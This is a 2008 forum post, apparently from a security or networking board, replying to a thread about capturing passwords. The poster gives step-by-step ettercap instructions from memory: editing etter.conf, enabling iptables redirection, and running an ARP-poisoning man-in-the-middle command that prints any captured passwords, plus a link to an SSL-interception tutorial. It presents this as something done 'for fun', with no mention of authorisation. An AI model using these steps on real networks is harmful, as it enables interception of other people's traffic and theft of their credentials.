View Single Post
  #17 (permalink)  
Old 08-03-2008, 10:39 PM
ipndrmath ipndrmath is offline
Member
 
Join Date: Jul 2007
Posts: 71
Default No plain text passwords ... what's the point

Quote:
Originally Posted by Abracadabra View Post
In that case it worked perfectly and it was decrypted in plain text......
If you didn't get the password or login, what was the point? Just use ettercap, in fact I did it just today for fun (ah, how nerdy).

Off of memory:

edit etter.conf (use locate)
set UID and GID to 0
look for iptables under "Linux" and uncomment both lines
ettercap -T -q -i whateverinterface -M arp:remote // //

Use ettercap -I to find out what interface you can use.
This will print any passwords that are captured to stout.

Read a tutorial on ettercap, you can do some crazy things.
Try here http://www.iljya.com/projects/SSLVideo/

P.S. Some one correct me if I'm wrong above.

Last edited by ipndrmath; 08-03-2008 at 10:42 PM. Reason: added link
Reply With Quote